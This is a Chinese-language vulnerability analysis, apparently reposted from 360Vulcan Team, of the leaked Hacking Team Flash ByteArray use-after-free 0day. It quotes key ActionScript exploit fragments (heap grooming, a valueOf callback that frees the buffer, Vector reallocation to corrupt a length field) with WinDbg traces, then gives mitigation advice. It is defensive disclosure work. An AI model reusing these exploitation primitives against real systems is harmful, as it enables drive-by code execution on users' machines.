Hacking Team攻击代码分析Part 1:Flash 0day

最近专门提供通过攻击手法进行网络监听的黑客公司Hacking Team被黑,包含该公司的邮件、文档和攻击代码的400G数据泄漏。360Vulcan Team第一时间获取了相关信息,并对其中的攻击代码进行了分析。

我们发现其中至少包含了两个针对Adobe Flash的远程代码执行漏洞和一个针对微软Windows内核字体权限提升漏洞的完整攻击代码(exploit)。其中一个Flash漏洞已经在今年4月修补,其他两个漏洞都未修复。

其中Flash漏洞exploit被设计为可以针对IE、Chrome浏览器和Office软件进行攻击。攻击者通过嵌入精心构造的恶意Flash文件到网页或Office文档中,使得访问特定网页或打开Office文档的用户感染恶意代码。同时,这些恶意代码通过结合Windows内核字体权限提升漏洞,可以绕过IE(保护模式或增强保护模式)、Chrome(Chrome Sandbox,< Chrome 43)和Office(保护模式)的沙盒保护,完全控制用户的电脑。

360Vulcan Team对这些漏洞进行分析,并分为三个部分将这些0day的信息共享给安全社区,希望软件厂商和安全厂商共同行动,尽快修补和防御着这些“在野”的0day漏洞。

Flash 0day -ActionScript ByteArray Buffer Use After Free

看起来HackingTeam的远程exploit工具中广泛使用了同一个flash漏洞(攻击目标可以是IE、Chrome、Office系列):

初步分析这个Exploit之后,我们发现这个Exploit在最新版本的Adobe Flash(18.0.0.194)中仍然可以触发,因此这应该是一个0day漏洞。

漏洞原理分析

这个漏洞成因在于,Flash对ByteArray内部的buffer使用不当,而造成Use After Free漏洞。

我们来看一下HackingTeam泄露的exploit代码,关键部分如下:

1. 定义ByteArray

for(var i:int; i < alen; i+=3){                  a[i] = new Class2(i);                                   a[i+1] = new ByteArray();                  a[i+1].length = 0xfa0;                                   a[i+2] = new Class2(i+2);              }

首先定义一系列的ByteArray,这些ByteArray初始大小被设置成0xfa0,ActionScript内部会为每个Buffer分配0×1000大小的内存。

1. 给ByteArray元素赋值:

_ba = a[i];                  // call valueOf() and cause UaF memory corruption                  _ba[3] = new Clasz();

这一步是触发漏洞的关键,由于ByteArray的元素类型是Byte,当把Clasz类赋值给ByteArray[3]时,AVM会试图将其转化为Byte,此时Clasz的valueOf函数将被调用:

prototype.valueOf = function()      {          ref = new Array(5);          collect.push(ref);                   // realloc          _ba.length = 0x1100;                   // use after free          for (var i:int; i < ref.length; i++)              ref[i] = new Vector.<uint>(0x3f0);                   return 0x40      }

在valueOf函数中,最关键的一部是更改了ByteArray的长度,将其设置成为0×1100,这个操作将会触发ByteArray内部buffer的重新分配,旧的buffer(大小为0×1000)将会被释放。紧接着exploit代码会分配若干个vector对象,每个vector同样占用0×1000字节的内存,试图去重新使用已经释放的ByteArray buffer的内存。

valueOf函数返回0×40,然后0×40会被写入buffer[3]这里,如果逻辑正确,那么此处应该写入的是新分配的buffer;然而由于代码漏洞,这里写入的已经释放的0×1000大小的旧buffer,于是事实上写入的是vector对象的头部,整个过程如下:

1. ByteArray创建并设置长度0xfe0:

old buffer  |                       | 0                                 0x1000 2.  设置_ba[3],调用valueOf,在valueOf中设置ByteArray.length = 0x1100,此时old buffer被释放 old buffer (Freed)  |                       | 0                                 0x1000 3.  然后0x1000大小的vector占据old buffer内存,前4个字节是vector的长度字段: Vector          | f0 03 00 00               | 0                                 0x1000 4.  valueOf返回0x40,0x40被写入buffer[3],由于UAF漏洞的存在,写入的是vector的size字段: Vector          | f0 03 00 40               | 0                                 0x1000

于是我们可以得到一个超长的vector对象:

 

我们可以通过调试来观察漏洞的触发过程:

1. 调用valueOf之前

0:005> u 671cf2a5   call     671b0930 //这里最终调用valueOf 671cf2aa 83c404          add     esp,4 671cf2ad 8806            mov     byte ptr [esi],al 671cf2af 5e              pop     esi

此时esi指向old buffer:

0:005> dd esi-3 0dfd5000  00000000 00000000 00000000 00000000 0dfd5010  00000000 00000000 00000000 00000000

2. 调用valueOf之后,old buffer被释放,然后被vector占据:

此时esi已经指向新分配的vector,就buffer已经被释放

0:005> dd esi-3 0dfd5000  000003f0 0d2b3000 00000000 00000000 0dfd5010  00000000 00000000 00000000 00000000 0dfd5020  00000000 00000000 00000000 00000000 0dfd5030  00000000 00000000 00000000 00000000 0dfd5040  00000000 00000000 00000000 00000000 0dfd5050  00000000 00000000 00000000 00000000 0dfd5060  00000000 00000000 00000000 00000000 0dfd5070  00000000 00000000 00000000 00000000

3. 写入buffer[3

接下来valueOf的返回值0x40被写入buffer[3](及vector.size字段):

0:005> p eax=00000040 ebx=0d8b4921 ecx=00000206 edx=00000006 esi=0dfd5003 edi=0d362020 eip=671cf2ad esp=04f2ceec ebp=04f2d050 iopl=0         nv up ei pl nz na po nc cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200202 Flash32_18_0_0_194!IAEModule_IAEKernel_UnloadModule+0x1ba07d: 671cf2ad 8806            mov     byte ptr [esi],al          ds:0023:0dfd5003=00 0:005> p Flash32_18_0_0_194!IAEModule_IAEKernel_UnloadModule+0x1ba07f: 671cf2af 5e              pop     esi 0:005> dd esi-3 0dfd5000  400003f0 0d2b3000 00000000 00000000 0dfd5010  00000000 00000000 00000000 00000000 0dfd5020  00000000 00000000 00000000 00000000 0dfd5030  00000000 00000000 00000000 00000000

可以看到vector的长度以及被修改成0x400003f0。

漏洞防范

由于该漏洞利用非常稳定,而Adobe暂时没有发布该漏洞的补丁,更可怕的是从HackingTeam泄露的数据来看,该exploit还带有沙盒突破提权功能,危害甚大。我们建议补丁发布之前,可以暂时先禁用flash插件;也可以开启Chrome或Chrome核心浏览器针对插件的Click-to-Run功能,来缓解Flash 0day的攻击。

文章来源网络,作者:运维,如若转载,请注明出处:https://shuyeidc.com/wp/144471.html<

(0)
运维的头像运维
上一篇2025-03-10 04:31
下一篇 2025-03-10 04:32

相关推荐

  • 个人主题怎么制作?

    制作个人主题是一个将个人风格、兴趣或专业领域转化为视觉化或结构化内容的过程,无论是用于个人博客、作品集、社交媒体账号还是品牌形象,核心都是围绕“个人特色”展开,以下从定位、内容规划、视觉设计、技术实现四个维度,详细拆解制作个人主题的完整流程,明确主题定位:找到个人特色的核心主题定位是所有工作的起点,需要先回答……

    2025-11-20
    0
  • 社群营销管理关键是什么?

    社群营销的核心在于通过建立有温度、有价值、有归属感的社群,实现用户留存、转化和品牌传播,其管理需贯穿“目标定位-内容运营-用户互动-数据驱动-风险控制”全流程,以下从五个维度展开详细说明:明确社群定位与目标社群管理的首要任务是精准定位,需明确社群的核心价值(如行业交流、产品使用指导、兴趣分享等)、目标用户画像……

    2025-11-20
    0
  • 香港公司网站备案需要什么材料?

    香港公司进行网站备案是一个涉及多部门协调、流程相对严谨的过程,尤其需兼顾中国内地与香港两地的监管要求,由于香港公司注册地与中国内地不同,其网站若主要服务内地用户或使用内地服务器,需根据服务器位置、网站内容性质等,选择对应的备案路径(如工信部ICP备案或公安备案),以下从备案主体资格、流程步骤、材料准备、注意事项……

    2025-11-20
    0
  • 如何企业上云推广

    企业上云已成为数字化转型的核心战略,但推广过程中需结合行业特性、企业痛点与市场需求,构建系统性、多维度的推广体系,以下从市场定位、策略设计、执行落地及效果优化四个维度,详细拆解企业上云推广的实践路径,精准定位:明确目标企业与核心价值企业上云并非“一刀切”的方案,需先锁定目标客户群体,提炼差异化价值主张,客户分层……

    2025-11-20
    0
  • PS设计搜索框的实用技巧有哪些?

    在PS中设计一个美观且功能性的搜索框需要结合创意构思、视觉设计和用户体验考量,以下从设计思路、制作步骤、细节优化及交互预览等方面详细说明,帮助打造符合需求的搜索框,设计前的规划明确使用场景:根据网站或APP的整体风格确定搜索框的调性,例如极简风适合细线条和纯色,科技感适合渐变和发光效果,电商类则可能需要突出搜索……

    2025-11-20
    0

发表回复

您的邮箱地址不会被公开。必填项已用 * 标注